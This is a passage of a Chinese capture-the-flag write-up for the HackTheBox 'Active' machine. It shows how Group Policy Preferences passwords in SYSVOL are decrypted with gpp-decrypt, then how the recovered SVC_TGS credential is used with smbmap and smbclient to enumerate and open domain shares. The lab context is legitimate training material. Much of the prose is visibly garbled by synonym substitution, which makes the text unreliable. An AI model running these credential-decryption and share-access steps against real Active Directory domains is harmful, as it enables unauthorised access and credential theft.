只要建设了一个新的GPP(组计策首选项),城市在SYSVOL share中建设一个数据设置的xml文件,,包罗任何与GPP相干的暗码。不外,为了安详起见,在存储之前,Microsoft AES对暗码举办了加密处理赏罚。可是,Microsoft又在MSDN上宣布了秘钥。
微软在2014年宣布了一个补丁,防备打点员将暗码写入GPP。可是这个补丁对付那些已存在的可破解的暗码不起任何浸染。并且据我所知,渗出测试员在2018年也常常可以或许发明这些秘钥。更多详情,请看这篇博客:AD security。
破解GPP暗码
既然获得了秘钥,我们就可以举办破解了。Kali上有一个器材gpp-decrypt可以破解:
- root@kali:~/hackthebox/active-10.10.10.100/smb-loot# gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
- GPPstillStandingStrong2k18
用户共享-SMB
有了用户名和暗码,我又能多会见3个share了。
- root@kali:~/hackthebox/active-10.10.10.100/smb-loot# smbmap -H 10.10.10.100 -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18
- [+] Finding open SMB ports....
- [+] User SMB session establishd on 10.10.10.100...
- [+] IP: 10.10.10.100:445 Name: 10.10.10.100
- Disk Permissions
- ---- -----------
- ADMIN$ NO ACCESS
- C$ NO ACCESS
- IPC$ NO ACCESS
- NETLOGON READ ONLY
- Replication READ ONLY
- SYSVOL READ ONLY
- Users READ ONLY
当我毗连到用户共享时,看起来有点像是C:Users目次,究竟上就是这个目次:
- root@kali:~/hackthebox/active-10.10.10.100# smbclient //10.10.10.100/Users -U active.htbSVC_TGS%GPPstillStandingStrong2k18
- Try "help" to get a list of possible commands.
- smb: > dir
- . DR 0 Sat Jul 21 10:39:20 2018
- .. DR 0 Sat Jul 21 10:39:20 2018
- Administrator D 0 Mon Jul 16 06:14:21 2018
- All Users DHS 0 Tue Jul 14 01:06:44 2009
- Default DHR 0 Tue Jul 14 02:38:21 2009
- Default User DHS 0 Tue Jul 14 01:06:44 2009
- desktop.ini AHS 174 Tue Jul 14 00:57:55 2009
- Public DR 0 Tue Jul 14 00:57:55 2009
- SVC_TGS D 0 Sat Jul 21 11:16:32 2018
-
- 10459647 blocks of size 4096. 6308502 blocks available
(编辑:湖南网)
【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!
|